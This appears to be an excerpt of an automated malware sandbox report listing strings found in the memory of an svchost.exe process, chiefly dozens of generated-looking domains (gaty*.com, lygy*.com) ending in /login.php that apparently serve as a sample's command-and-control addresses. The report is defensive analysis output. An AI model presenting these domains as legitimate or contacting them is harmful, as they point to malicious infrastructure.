Source: svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353793003.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2745079929.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351137108.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738516422.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738837414.0000000008783000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gatyhos.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558367053.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301364243.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gatyhub.com/login.php
Source: svchost.exe, 00000002.00000003.2709443016.00000000033AD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670655678.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2673206249.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671925473.00000000033AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gatykyh.com/H
Source: svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350325354.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353878040.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352879533.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gatykyh.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3246274264.000000000870B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330154891.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403579535.000000000870D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771121340.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323585198.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610522908.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gatynes.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2308037835.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272828863.0000000008701000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2503287920.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502622128.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296517767.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272537462.00000000086FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2264150395.00000000086FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302432052.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272290978.00000000086FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513112023.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2283080934.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2305095010.0000000008701000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2295479426.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296451736.0000000008702000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2273007343.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2280606997.0000000000882000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gatypub.com/login.php
Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384269083.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gatypuz.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2308037835.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302432052.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2556984027.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2305095010.0000000008701000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301364243.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gatyqih.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2550145927.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2308037835.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296517767.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549686862.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548641598.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302432052.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547272194.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2305095010.0000000008701000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298813609.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2295479426.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296451736.0000000008702000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gatyrez.com/login.php
Source: svchost.exe, 00000002.00000003.2672088553.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671936852.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gatyruw.com/login.php
Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3246274264.000000000870B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801238635.00000000087FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384269083.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3267123963.0000000003347000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2800821291.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384104652.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gatyzyw.com/login.php
Source: svchost.exe, 00000002.00000003.2440992752.000000000866F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lygyfex.com/
Source: svchost.exe, 00000002.00000003.2194039895.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557475743.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2503287920.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502622128.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393093066.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577719348.0000000008784000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2434703123.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393409003.000000000338E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548810720.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513112023.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578793071.0000000008786000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3347345159.000000000338D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2581725706.0000000008785000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lygyfex.com/login.php
Source: svchost.exe, 00000002.00000003.2334859023.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334498126.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334047161.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332552292.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337179930.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337298832.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336661299.0000000003304000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334800958.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336766554.0000000003353000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lygyfir.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321460609.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321367524.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610522908.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323657176.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2768400966.0000000008705000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738516422.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2320047859.00000000033EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lygyjuj.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2307697997.0000000003394000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2556984027.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lygylax.com/login.php
Source: svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lygylur.com/login.php
Source: svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326892101.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328870829.000000000868F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lygymyn.com/login.php
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337642053.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334498126.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2607736058.0000000008786000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334047161.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338382961.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332552292.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334859023.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337179930.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610522908.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334936802.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336690325.0000000008692000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336661299.0000000003304000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332778027.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2608469388.00000000087FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333419776.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334800958.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610879120.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604615321.0000000008783000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lygynox.com/login.php
Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3283281392.0000000008784000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2799115351.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393093066.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3267123963.0000000003347000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404003407.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3402591277.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384104652.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384269083.0000000000882000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lygysid.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321367524.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302834749.0000000008690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lygytyd.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2308037835.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272828863.0000000008701000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2503287920.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296517767.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272537462.00000000086FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2264150395.00000000086FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302432052.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2524832364.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272290978.00000000086FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513112023.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2267838094.0000000003391000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2283080934.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2305095010.0000000008701000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2295479426.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296451736.0000000008702000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2273007343.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lygyvar.com/login.php
Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3246274264.000000000870B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2805126129.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3266427470.00000000087A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lygyvon.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332778027.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333419776.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lygywor.com/login.php
Source: svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672088553.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350325354.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738837414.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671484952.00000000086F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lygyxad.com/login.php
Source: svchost.exe, 00000002.00000003.2763334143.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2550145927.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2297525559.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403450959.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3265760525.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296551987.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771121340.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296517767.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549686862.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548641598.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lygyxun.com/login.php
